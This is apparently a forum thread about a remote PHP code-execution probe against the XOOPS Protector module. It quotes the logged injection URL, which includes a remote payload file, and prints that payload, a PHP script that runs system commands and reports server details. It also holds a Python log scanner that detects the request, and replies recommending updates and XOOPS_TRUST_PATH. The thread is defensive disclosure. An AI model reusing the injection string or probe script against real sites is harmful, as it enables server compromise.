Look what I found by reviewing the log last month:
/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}include($_GET[a]);function v&a=http://community.creativity.edu.tw/uploads/idomila.txt??
and the file they want to run contains:
<?php
function ConvertBytes($number)
{
$len = strlen($number);
if($len < 4)
{
return sprintf("%d b", $number);
}
if($len >= 4 && $len <=6)
{
return sprintf("%0.2f Kb", $number/1024);
}
if($len >= 7 && $len <=9)
{
return sprintf("%0.2f Mb", $number/1024/1024);
}
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
echo "Pandega<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;
echo "Pandega was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
?>
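An added example, not part of the original post and not XOOPS or Protector code: a Python check that flags access-log lines with the request shape quoted above, generalized to any script path and any parameter that carries a remote URL. It assumes Apache combined log format and that a legitimate mydirname is a plain directory name; the log lines, addresses and the attacker.example host are constructed.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: a legitimate mydirname is a plain module directory name.
SAFE_DIRNAME = re.compile(r"[A-Za-z0-9_-]+")
REMOTE_URL = re.compile(r"(?:https?|ftp)://", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

SAMPLE_LOG = [  # constructed lines in Apache combined log format
    '203.0.113.7 - - [12/Mar/2009:04:11:52 +0000] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a(){}include($_GET[a]);function%20v&a=http://attacker.example/payload.txt?? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"',
    '198.51.100.23 - - [12/Mar/2009:04:12:10 +0000] "GET /modules/news/article.php?storyid=4601 HTTP/1.1" 200 18432 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [12/Mar/2009:04:13:01 +0000] "GET /index.php?mydirname=a%28%29%7B%7Dinclude%28%24_GET%5Ba%5D%29%3Bfunction+v&a=hTTp%3A%2F%2Fattacker.example%2Fpayload.txt HTTP/1.1" 404 210 "-" "-"',
]

def findings(log_line):
    """Return the reasons the request in log_line looks like the probe."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    reasons = []
    # Split on '&' only, then decode, so ';' inside a value stays intact
    # and percent-encoded variants are compared in decoded form.
    for pair in urlsplit(m.group(1)).query.split("&"):
        name, _, value = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(value)
        if name == "mydirname" and not SAFE_DIRNAME.fullmatch(value):
            reasons.append("mydirname is not a plain directory name")
        if REMOTE_URL.match(value):
            reasons.append(f"parameter {name!r} carries a remote URL")
    return reasons

def scan(lines):
    """Return (client address, reasons) for every flagged line."""
    return [(line.split()[0], r) for line in lines if (r := findings(line))]

if __name__ == "__main__":
    for client, reasons in scan(SAMPLE_LOG):
        print(client, "; ".join(reasons))
```
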
Yes, this is a Remote PHP Code Execution exploit. It was a disputed issue whether it was Protector's fault or XOOPS's. The safe thing to do is to put Protector outside your site root. Anyway, this bug was fixed with XOOPS 2.3.3, so if you are still running XOOPS 2.3.2 you need to update, and/or update your Protector to the latest release.
From the code you provided, I see he or she was attempting to leave you a message saying 'Pandega was here ..'. Haha, the joke is on him now since you caught him. If it were me, I would leave a message on my site that says: Pandega was not here. Ha.
See the link below, where this issue was addressed and suggestions were provided:
http://www.xoops.org/modules/news/article.php?storyid=4601
The link was informative for me as a newbie. Thanks
Just read it.
http://xoops.peak.ne.jp/md/news/index.php?page=article&storyid=472
It's not Protector's issue.
This is just a vulnerability of "XOOPS" self-called by phppp.
They cannot understand the meaning of XOOPS_TRUST_PATH yet.
The idea and/or concept of XOOPS_TRUST_PATH is to secure a Xoops module by moving all of the module's PHP files out of web root or DOCUMENT_ROOT. In doing so, modules could not be easily tampered with by potential crackers, especially if the module has private files included under the document root.